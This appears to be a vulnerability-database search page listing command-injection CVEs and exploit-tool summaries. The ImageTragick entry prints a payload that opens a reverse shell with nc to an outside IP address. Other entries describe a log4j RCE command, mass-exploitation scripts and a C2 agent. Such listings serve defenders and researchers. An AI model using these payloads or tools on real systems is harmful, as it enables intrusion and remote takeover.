Lucene search
+L

1963 matches found

Nuclei
Nuclei
added 2026/09/13 4:24 p.m.113 views

Citrix SD-WAN Center - Remote Command Injection

Citrix SD-WAN Center is susceptible to remote command injection via the addModifyZTDProxy function in NmsController. The function does not sufficiently validate or sanitize HTTP request parameter values that are used to construct a shell command. An attacker can trigger this vulnerability by...

10CVSS8.4AI score0.42551EPSS
SaveExploits1References3
Nuclei
Nuclei
added 2026/09/13 4:24 p.m.94 views

Citrix SD-WAN Center - Remote Command Injection

Citrix SD-WAN Center is susceptible to remote command injection via the ping function in DiagnosticsController, which does not sufficiently validate or sanitize HTTP request parameter values used to construct a shell command. An attacker can trigger this vulnerability by routing traffic through t...

10CVSS8.4AI score0.39544EPSS
SaveExploits1References3
Kitploit
Kitploit
added 2026/09/13 8:23 a.m.7 views

Richsploit

Richsploit Richsploit: Kit de explotación para RichFaces. Resumen Richsploit puede utilizarse para explotar endpoints JSF mediante RichFaces. Todas las versiones desde 3.1.0 en adelante son vulnerables. root@kitploit: usage: Richsploit -e,--exploit 0: CVE-2013-2165 1: CVE-2015-0279 2:...

9.8CVSS8.4AI score0.74171EPSS
SaveExploits12
Kitploit
Kitploit
added 2026/09/13 5:08 a.m.8 views

log4j-rce-test

构建 ./build.sh 启动 log4j RCE 服务器 ./start-log4j-rce-server.sh 测试 运行 java -cp log4j-rce-1.0-SNAPSHOT-all.jar log4j 检查当前文件夹中的 hack.log 是否获得日志 你可以修改这一行 String cmds = "sh", "-c", "echo 'Exploit at '" + getDateString + " ./hack.log" ; 在文件 apache-log4j-poc/src/main/java/Exploit.java 中 改成你想要的任何内容,然后重新构建并运行...

5.8AI score
SaveExploits0References3
Kitploit
Kitploit
added 2026/09/13 3:25 a.m.7 views

CVE-2023-34152

CVE-2023-34152 影响 ImageMagick 6.9.6-4 的 RCE 漏洞。该漏洞允许攻击者在受害者系统上执行命令,从而实现远程命令执行。 这是一个受 fullwaywang 对 CVE-2023-34152 发现启发的 POC。 漏洞披露 root@kitploit: 使用方式:python3 CVE-2023-34152.py 攻击者IP 攻击者端口 描述 OpenBlob 中存在一个任意代码执行漏洞(shell 命令注入),这实际上是对 CVE-2016-5118 的不完全修复。 CVE-2016-5118 表明,打开任何文件名以 '|'...

9.8CVSS8.1AI score0.08011EPSS
SaveExploits3References2
Kitploit
Kitploit
added 2026/09/13 3:01 a.m.8 views

CVE-2025-24893-PoC

CVE-2025-24893 - XWiki 远程代码执行 RCE 这是一个针对 CVE-2025-24893 的更新版概念验证 PoC 利用代码,该漏洞是 XWiki 中的一个关键未认证 RCE 漏洞。此版本在原版基础上进行了改进,允许执行任意 shell 命令并实现干净的反弹 shell 注入。 作者: HexHunter404 ⚠️ 警告 此代码仅供教育和授权的渗透测试使用 。 请勿将其用于您不拥有或未经明确许可测试的系统上。 ✨ 功能特点 支持通过 bash -c '' 执行命令 完全支持反弹 shell(通过 base64 绕过 Groovy 限制) 改进了命令输出的处理 保留...

9.8CVSS8AI score0.99864EPSS
SaveExploits52References1
Kitploit
Kitploit
added 2026/09/13 1:59 a.m.5 views

ImageTragick_Poc

ImageTragick POCs RCEPOC root@kitploit: push graphic-context viewbox 0 0 640 480 fill 'urlhttps://example.com/image.jpg"|mknod /tmp/backpipe p && nc 121.42.56.8 8989 0/tmp/backpipe"' pop graphic-context root@kitploit: push graphic-context viewbox 0 0 640 480 fill...

6AI score
SaveExploits0
Kitploit
Kitploit
added 2026/09/13 1:52 a.m.8 views

cve-2023-1671

Cve-2023-1671 Cve-2023-1671(https://vulners.com/cve/CVE-2023-1671)是如何工作的? /opt/ws/bin/ftsblistpack 是一个 Perl 脚本,它调用 /opt/ws/bin/sblistpack,这是另一个 Perl 脚本。 其中的 shell 命令参数用单引号括起来: root@kitploit: $rc += system"$sblistpack '$uri' '$user' '$filetype' '$filein' '$fileout'"; 这一点将来会很重要,它将成为导致漏洞的因素之一。...

9.8CVSS8.4AI score0.99999EPSS
SaveExploits10References1
Kitploit
Kitploit
added 2026/09/12 11:22 p.m.6 views

Langflow-CVE-2025-3248-Multi-target

⚠️ Escáner de Explotación RCE de Langflow CVE-2025-3248 Este escáner basado en Python automatiza la detección de vulnerabilidades de Ejecución Remota de Código RCE sin autenticación en instancias de Langflow a través de CVE-2025-3248. Utiliza un payload de prueba de concepto que abusa del endpoint...

9.8CVSS8.4AI score0.99989EPSS
SaveExploits37
Kitploit
Kitploit
added 2026/09/12 3:19 p.m.6 views

CVE-2023-46604

CVE-2023-46604 01. Apache ActiveMQ 和 OpenWire 1 Apache ActiveMQ 与 OpenWire 概述 ActiveMQ 是一个开源的消息传递和集成模式服务器,它包含支持 JMS 的代理(Broker),不仅可以在 Java 环境中使用,还能够实现使用多种语言的系统之间的通信。此外,通过集群功能、数据库以及文件系统,它维护了各系统之间的一致性和持久性。 OpenWire 是 Apache ActiveMQ 使用的一种二进制消息协议。它专为代理(ActiveMQ)与客户端之间的高效数据传输而设计。 CVE-2023-46604 是...

10CVSS7.6AI score0.99723EPSS
SaveExploits33References1
Kitploit
Kitploit
added 2026/09/12 6:15 a.m.9 views

PyHmmm

PyHmmm ¿Qué es esto? Esto es un agente de terceros para Havoc C2 escrito en python. Está pensado como un PoC básico para aprender a escribir agentes personalizados de Havoc, con su publicación de blog correspondiente...

6AI score
SaveExploits0
NVD
NVD
added 2026/09/10 5:17 p.m.6 views

CVE-2026-65638

Improper escaping of a request URL in ConfigServer Security & Firewall allows an unauthenticated remote attacker to execute arbitrary commands as the CSF service account via shell command injection. The vulnerability affects versions of the software originally distributed by ConfigServer, as well...

9.2CVSS0.03199EPSS
SaveExploits0References1
Cvelist
Cvelist
added 2026/09/10 4:24 p.m.36 views

CVE-2026-65638

Improper escaping of a request URL in ConfigServer Security & Firewall allows an unauthenticated remote attacker to execute arbitrary commands as the CSF service account via shell command injection. The vulnerability affects versions of the software originally distributed by ConfigServer, as well...

9.2CVSS0.03199EPSS
SaveExploits0References1
EUVD
EUVD
added 2026/09/10 4:24 p.m.10 views

EUVD-2026-75595

Improper escaping of a request URL in ConfigServer Security & Firewall allows an unauthenticated remote attacker to execute arbitrary commands as the CSF service account via shell command injection. The vulnerability affects versions of the software originally distributed by ConfigServer, as well...

9.2CVSS0.03199EPSS
SaveExploits0References1
Kitploit
Kitploit
added 2026/09/10 1:31 a.m.8 views

CVE-2021-45897

CVE-2021-45897 PoC para CVE-2021-45897, también conocido como SCRMBT-180 - RCE mediante Plantillas de Correo Electrónico solo autenticado en SuiteCRM = 8.0.0. Defaults to False --help Show this message and exit. https://github.com/manuelz120/CVE-2021-45897...

8.8CVSS7.9AI score0.04608EPSS
SaveExploits2
Positive Technologies
Positive Technologies
added 2026/09/10 12:00 a.m.9 views

PT-2026-89492

Improper escaping of a request URL in ConfigServer Security & Firewall allows an unauthenticated remote attacker to execute arbitrary commands as the CSF service account via shell command injection. The vulnerability affects versions of the software originally distributed by ConfigServer, as well...

9.2CVSS0.03199EPSS
SaveExploits0References3
Kitploit
Kitploit
added 2026/09/08 9:25 p.m.8 views

Struts-Apache-ExploitPack

Struts-Apache-ExploitPack Estos son solo algunos scripts que puedes usar para detectar y explotar la vulnerabilidad de Apache Struts CVE-2017-5638 Hay un MassScanner y un Exploiter, puedes usar el escáner para escanear masivamente una lista de URLs y luego explotarlas con el Exploiter. El Exploit...

10CVSS8.2AI score0.99999EPSS
SaveExploits46
Cvelist
Cvelist
added 2026/09/08 3:14 p.m.25 views

CVE-2026-86733 Snipe-IT before 8.7.0 Remote Code Execution via Backup Restore

Snipe-IT before 8.7.0 streams the SQL entry from an uploaded backup archive directly into the MySQL/MariaDB command-line client mysql without the --binary-mode flag, so the client interprets lines beginning with backslash commands such as ! as local shell commands. An authenticated...

8.6CVSS0.00325EPSS
SaveExploits0References2
Kitploit
Kitploit
added 2026/09/07 2:41 p.m.6 views

CVE-2024-4358

CVE-2024-4358 Una herramienta de detección de vulnerabilidades y explotación masiva para CVE-2024-4358 Instalación: root@kitploit: git clone https://github.com/RevoltSecurities/CVE-2024-4358 pip install -r requirements.txt python3 exploit.py --help Uso: root@kitploit: python3 exploit.py -h / / / ...

9.8CVSS8.8AI score0.97482EPSS
SaveExploits14
Kitploit
Kitploit
added 2026/09/07 1:41 p.m.7 views

cve-2025-49844

CVE-2025-49844 Mi prueba de concepto personal para CVE-2025-49844, también conocido como RediShell. Compilaciones de destino compatibles: Linux x86-64, imagen Docker redis:8.2.1-alpine Linux x86-64, imagen Docker redis:8.2.1-bookworm Es un poco torpe, probablemente no tan bueno como el de Wiz...

9.9CVSS7.7AI score0.82294EPSS
SaveExploits14
Rows per page
Query Builder